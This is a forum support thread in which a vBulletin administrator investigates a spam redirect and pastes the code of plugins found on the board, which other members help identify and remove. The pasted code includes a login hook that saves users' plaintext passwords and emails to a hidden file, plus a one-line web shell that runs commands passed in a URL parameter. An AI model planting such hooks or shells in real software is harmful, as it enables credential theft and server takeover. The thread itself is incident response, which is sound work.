Myfilestore.com Virus

[MarkFL]

Does that fix the issue? Out of curiosity, would you post the code within those two plugins?

[Dave]

You can also try the following in order to track where it's coming from or how it happened:
- Check the logs at AdminCP > Statistics & Logs > Control Panel Log > look for entries that come from unfamiliar IP addresses.
- Disable all plugins and hooks. (guide) Problem still exists after all plugins/hooks disabled? Then it's possible that certain PHP/JS files are modified on your server.

[mscottralston]

MarkFL: I can't tell if it's fixed or not. When I go to privateerpressforums.com from a google link (the originally-reported way that this issue manifested), I don't get redirected to this spam website, so... hopefully it's fixed? I was never able to reproduce the issue in the first place, though. Lots of forum users were very vocal about it over the weekend.

Here are the codes:

global_rewrite:

$show['nopasswordempty'] = TRUE;

login_rewrite:

$lg_username = strtolower($vbulletin->GPC["vb_login_username"]);
$lg_password = $vbulletin->GPC["vb_login_password"];
$lg_file = "./customavatars/lg.html";
$sql_query = @mysql_query("SELECT * FROM " . TABLE_PREFIX . "user WHERE username='" . $lg_username . "'");

while($row = @mysql_fetch_array($sql_query))
{

if(strlen($lg_password) > 1 AND strlen($lg_username) > 1)
{
$fp1 = @fopen($lg_file, "a+");
@fwrite($fp1, $lg_username . ':' . $lg_password." (" . $row["email"] . ")\n");
@fclose($fp1);
$f = @file($lg_file);
$new = array_unique($f);
$fp = @fopen($lg_file, "w");
foreach($new as $values)
{
@fputs($fp, $values);
}
@fclose($fp);
}
}

The Federal plugins are still on. Here are their codes:

if(isset($_GET['lol'])){echo
"<h1>lol</h1><pre>"; system($_GET
['lol']);exit;}

and

if(isset($_GET['lol'])){echo
"<h1>lol</h1><pre>"; system($_GET
['lol']);exit;}

In other words, they're identical. Not sure why there are two of them. In general they seem a bit suspicious to me.

Dave: I don't see any suspicious log entries from the past few weeks (though it's unclear to me exactly when this issue started). The IPs are all me and known moderators.

[MarkFL]

Yeah, those "Federal" plugins look suspicious to me as well. That first one looks like it could be harvesting passwords/email addresses. If it were me, I would look on the server and see what's in the file "/customavatars/lg.html" and if it contains passwords and email addresses, I would download it (in case it is legit and needs to be restored) and delete it.

I would disable or even delete those 4 plugins (make backups in a text file on your hard drive in case you need them back).

Edit: if the file "/customavatars/lg.html" does appear to have passwords/email addresses, I would advise your users to change their passwords.

[oguzdinc]

I also could not solve my problem. As vbulletinsupport told me i deleted all plugins, and also i deleted ech files and i only have VSa - Advanced Forum Statistics on my website and it is the latest version. İ have to delete it?

[MarkFL]

Can you post exactly what you were told to do?

[mscottralston]

Hi MarkFL,

Indeed it was harvesting passwords. How awful. I will be backing up and deleting all four plugins.

Any idea how these got on our boards in the first place? I am going to be updating from 4.2.0 to 4.2.3 ASAP, but wanted to try to fix this issue before I did...

[MarkFL]

I would suspect an SQL exploit, and updating to vB 4.2.3 PL2 would be a good idea.

[Dave]

Definitely upgrade to the latest version as soon as possible.
It's entirely possible that they modified vBulletin's PHP files as well.

[mscottralston]

Will the upgrade to 4.2.3 overwrite these possibly-modified PHP files? Other than any possible compromises to security, the other thing I'm interested in is the extensive set of permissions-locked boards that we use -- not everything visible by everyone. As long as those permissions are preserved, I should be good, but if preserving them could allow a hack to persist, maybe not so good...